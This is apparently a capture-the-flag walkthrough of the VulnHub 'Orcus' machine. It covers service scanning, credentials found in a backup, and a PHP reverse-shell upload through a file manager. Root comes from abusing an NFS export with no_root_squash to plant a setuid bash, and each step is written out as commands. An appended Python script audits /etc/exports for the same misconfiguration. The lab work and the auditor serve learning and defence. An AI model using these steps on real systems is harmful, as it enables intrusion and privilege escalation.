Enough with the philosophical yadda yaddah.
First I fired up nmap and, as in the previous series, a gazillion services were running.
root@kali:/tmp# nmap -sT -A -PO 172.16.94.136
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-20 14:13 EDT
Nmap scan report for 172.16.94.136
Host is up (0.0055s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
53/tcp   open  domain      ISC BIND 9.10.3-P4-Ubuntu
| dns-nsid:
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 30 disallowed entries (15 shown)
| /exponent.js.php /exponent.js2.php /exponent.php
| /exponent_bootstrap.php /exponent_constants.php /exponent_php_setup.php
| /exponent_version.php /getswversion.php /login.php /overrides.php
| /popup.php /selector.php /site_rss.php /source_selector.php
|_/thumb.php
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp  open  pop3        Dovecot pop3d
|_pop3-capabilities: TOP STLS CAPA RESP-CODES SASL AUTH-RESP-CODE UIDL PIPELINING
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: ERROR: Script execution failed (use -d to debug)
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      50518/udp  mountd
|   100005  1,2,3      58138/tcp  mountd
|   100021  1,3,4      33074/tcp  nlockmgr
|   100021  1,3,4      56493/udp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open  imap        Dovecot imapd
|_imap-capabilities: ENABLE IMAP4rev1 more have post-login IDLE ID SASL-IR listed capabilities STARTTLS OK LOGINDISABLEDA0001 Pre-login LOGIN-REFERRALS LITERAL+
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: ERROR: Script execution failed (use -d to debug)
443/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp  open  ssl/imap    Dovecot imapd
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
995/tcp  open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: TOP USER CAPA RESP-CODES SASL(PLAIN) AUTH-RESP-CODE UIDL PIPELINING
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: ERROR: Script execution failed (use -d to debug)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
MAC Address: 00:0C:29:74:06:F8 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: Host: ORCUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h59m23s, deviation: 0s, median: 2h59m23s
|_nbstat: NetBIOS name: ORCUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: \x00
|   NetBIOS computer name: ORCUS\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-03-20T17:14:14-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   5.48 ms 172.16.94.136

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.34 seconds
I straight away went to port 80 and fired up nikto and got a mouthful of interesting folders and web apps to follow up on. I also fired up dirb to see if I could find any extra folders.
root@kali:/tmp# nikto -h http://172.16.94.136
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          172.16.94.136
+ Target Hostname:    172.16.94.136
+ Target Port:        80
+ Start Time:         2017-03-20 14:16:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x65 0x53ff6086e56aa
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/exponent.js.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent.js2.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_bootstrap.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_constants.php' in robots.txt returned a non-forbidden or redirect HTTP code (500)
+ Entry '/exponent_php_setup.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_version.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/getswversion.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/login.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/overrides.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/selector.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/site_rss.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/source_selector.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/thumb.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/ABOUT.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/CHANGELOG.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/CREDITS.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALLATION.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/README.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/RELEASE.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/TODO.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /files/: Directory indexing found.
+ Entry '/files/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 30 entries which should be manually viewed.
+ Multiple index files found: /index.html, /index.php
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-2870: /index.php?download=/etc/passwd: Snif 1.2.4 allows any file to be retrieved from the web server.
+ OSVDB-59085: /index.php?|=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
+ /index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)
+ OSVDB-59085: /index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /files/: This might be interesting...
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3092: : This might be interesting... possibly a system shell found.
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ /phpmyadmin/: phpMyAdmin directory found
+ 9338 requests: 0 error(s) and 48 item(s) reported on remote host
+ End Time:           2017-03-20 14:17:09 (GMT-4) (27 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
There are so many seemingly vulnerable (or actually vulnerable, I'll never know for sure) web apps, especially in the /external/ directory, that naturally I spent a long time here (so many wild goose chases).
At http://172.16.94.136/backups/ I downloaded SimplePHPQuiz-Backupz.tar.gz but didn't have the permissions to download ssh-creds.bak. I somehow already knew it wouldn't amount to much. I extracted the folder, went to the configs folder and found database credentials:
<?php
//Set the database access information as constants
DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');

@ $dbc = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
if (mysqli_connect_error()){
    echo "Could not connect to MySql. Please try again";
    exit();
}
?>
With this I immediately went to http://172.16.94.136/phpmyadmin/ and logged in. Boom!!
Now we have credentials to phpMyAdmin; all that is left is to write a shell using MySQL, browse to it and then get a shell.....
except it didn't happen that way, as the credentials didn't have write permission to the web root. They didn't even have FILE permissions. The VM is loaded with a few databases, so I decided to go through them one by one to see if there were backends to other web apps that we hadn't found in the enumeration phase. We were rewarded with the /zenphoto/ folder, an app that was missed by all my scanning and web bruting attempts. I browsed to it and had to install it first. I used the credentials from SimplePHPQuiz-Backupz.tar.gz and successfully installed it.
At this point the plan was to find a place to upload a webshell and get a reverse connection. I did this by:
Go to the Upload tab --> Click Files (elFinder) --> Zen photodata, right click on the pane on the right, click --> create new text, and then copy in everyone's favourite php-reverse-shell.
After copying it, right click, edit and change the file extension to php, then right click again and click Open (remember to have set up a netcat listener first). Then we'll get a limited reverse shell.
www-data@Orcus:/tmp/rooter$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Orcus:/tmp/rooter$ cd /var/www
cd /var/www
www-data@Orcus:/var/www$ ls
ls
9bd556e5c961356857d6d527a7973560-zen-cart-v1.5.4-12302014.zip
a0c4f0d176f87ceda9b9890af09ed644-Adem-master.zip
b873fef091715964d207daa19d320a99-zenphoto-zenphoto-1.4.10.tar.gz
flag.txt
html
zenphoto-zenphoto-1.4.10
www-data@Orcus:/var/www$ cd html
cd html
www-data@Orcus:/var/www/html$ ls
ls
ls: cannot open directory '.': Permission denied
www-data@Orcus:/var/www$ cat flag.txt
cat flag.txt
868c889965b7ada547fae81f922e45c4
www-data@Orcus:/var/www$
With the first flag in the bag, let's try and root this box. It took me a while to root it. I kept going away and trying privilege escalation exploits, until this morning, when I came back to my nmap scans and found this:
2049/tcp open nfs_acl 2-3 (RPC #100227)
I wonder why that didn't stick out to me in the first place. I quickly ran showmount:
root@kali:/tmp# showmount -e 172.16.94.136
Export list for 172.16.94.136:
/tmp *
I then checked the /etc/exports file and found that the NFS share was configured with no_root_squash:
www-data@Orcus:/$ cat /etc/exports
cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#		to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/tmp *(rw,no_root_squash)
On our Kali box, we mount the export:
root@kali:~# rm -rf /mnt/orcus/
root@kali:~# mkdir /mnt/orcus
root@kali:~# mount -t nfs -o proto=tcp,port=2049 172.16.94.136:/tmp /mnt/orcus
root@kali:~# touch /mnt/orcus/rooter
root@kali:~# chmod 777 /mnt/orcus/rooter
On our limited shell on Orcus we copy the bash binary into our newly created world-writable /tmp/rooter:
www-data@Orcus:/$ cp /bin/bash /tmp/rooter
We head back to our Kali box and set the setuid bit on the /tmp/rooter file (shell):
root@kali:~# chmod 4777 /mnt/orcus/rooter
We head into the /tmp folder, check to make sure the bit has been set, and then execute rooter with the -p option in order to preserve the privileges, which gets us root. :-)
www-data@Orcus:/$ ls -al
total 1124
drwxrwxrwt 10 root root    4096 Mar 27 08:45 .
drwxr-xr-x 24 root root    4096 Oct 30 23:05 ..
drwxrwxrwt  2 root root    4096 Mar 27 08:36 .ICE-unix
drwxrwxrwt  2 root root    4096 Mar 27 08:36 .Test-unix
drwxrwxrwt  2 root root    4096 Mar 27 08:36 .X11-unix
drwxrwxrwt  2 root root    4096 Mar 27 08:36 .XIM-unix
drwxrwxrwt  2 root root    4096 Mar 27 08:36 .font-unix
-rwsrwxrwx  1 root root 1109564 Mar 27 08:50 rooter
drwx------  3 root root    4096 Mar 27 08:36 systemd-private-9349aed2336c4fd5ad8749398e923f3c-dovecot.service-YyhShT
drwx------  3 root root    4096 Mar 27 08:36 systemd-private-9349aed2336c4fd5ad8749398e923f3c-systemd-timesyncd.service-ENaVWk
drwx------  2 root root    4096 Mar 27 08:36 vmware-root
www-data@Orcus:/$ ./rooter -p
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
cd /root
ls
flag.txt
cat flag.txt
807307b49314f822985d0410de7d8bfe
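The whole escalation above rests on one line of /etc/exports: a world-accessible, writable export with no_root_squash lets any NFS client drop a root-owned setuid binary into /tmp. As an added defensive check (example code written for this write-up, not from the original post or the Orcus VM), the script below parses exports(5) syntax and grades entries that combine a wildcard client with rw and no_root_squash; the sample exports text is constructed, and the severity ladder is my own assumption rather than any standard.

```python
# exports(5) defaults are the safe options (ro, root_squash, secure), so an
# entry is risky only when it explicitly names one of these widening options.
RISKY_OPTIONS = {"rw", "no_root_squash", "insecure"}

# Constructed sample in exports(5) syntax; the /tmp line is the Orcus one.
SAMPLE_EXPORTS = """\
/srv/homes  hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
/srv/nfs4   gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
/tmp *(rw,no_root_squash)
/data 10.0.0.0/8(rw)
/public (rw)
"""


def parse_exports(text):
    """Yield (path, client, options) for every client entry in the file."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        path, *rest = line.split(None, 1)
        # Entries look like host(opt,opt,...); option lists contain no spaces.
        for token in (rest[0].split() if rest else []):
            client, _, opts = token.partition("(")
            options = {o for o in opts.rstrip(")").split(",") if o}
            # exports(5) trap: "host (rw)" (space before the paren) applies
            # the options to every host, so an empty client means '*'.
            yield path, client or "*", options


def is_wildcard(client):
    """True when the client spec matches every host (or a whole /0 range)."""
    return client == "*" or client.endswith("/0")


def audit_exports(text):
    """Return (path, client, severity, reasons) for each risky export entry."""
    findings = []
    for path, client, options in parse_exports(text):
        reasons = ["client wildcard"] if is_wildcard(client) else []
        reasons += sorted(options & RISKY_OPTIONS)
        if not reasons:
            continue
        if is_wildcard(client) and {"rw", "no_root_squash"} <= options:
            severity = "critical"  # any host can plant a setuid-root binary
        elif "no_root_squash" in options or (is_wildcard(client) and "rw" in options):
            severity = "high"
        else:
            severity = "medium"
        findings.append((path, client, severity, reasons))
    return findings
```

Running audit_exports(SAMPLE_EXPORTS) reports the /tmp export as critical, the space-before-parenthesis /public entry as high, and the rw-to-named-host entries as medium for review.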
It was a great challenge that emphasized the importance of an organized approach as opposed to a randomized one. Thanks to Viper for the awesome challenge and of course g0tmi1k and the whole VulnHub community who keep the war games coming.